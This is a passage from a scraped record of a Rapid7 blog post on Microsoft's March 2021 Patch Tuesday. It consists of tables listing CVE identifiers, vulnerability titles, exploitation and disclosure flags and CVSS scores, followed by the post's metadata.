\n[CVE-2021-24110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24110>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27047](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27047>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27048](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27048>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27049>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27050](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27050>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27051>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27062>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24095>) | DirectX Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26890>) | Application Virtualization Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>) | Windows Win32k Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-26875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26875>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26873>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26899>) | Windows UPnP Device Host Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1640>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26878](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26878>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26862>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 6.3 | No \n[CVE-2021-26861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26861>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-24107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24107>) | Windows Event Tracing Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26872>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26898>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26901>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26897>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26877>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26893>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26894>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26895>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26896>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-27063](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27063>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-26869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26869>) | Windows ActiveX Installer Service Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26882>) | Remote Access API Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26881](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26881>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.5 | No \n[CVE-2021-26887](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26887>) | Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n## Summary Graphs\n\n", "modified": "2021-03-09T22:13:03", "published": "2021-03-09T22:13:03", "id": "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "href": "https://blog.rapid7.com/2021/03/09/patch-tuesday-march-2021/", "type": "rapid7blog", "title": "Patch Tuesday - March 2021", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}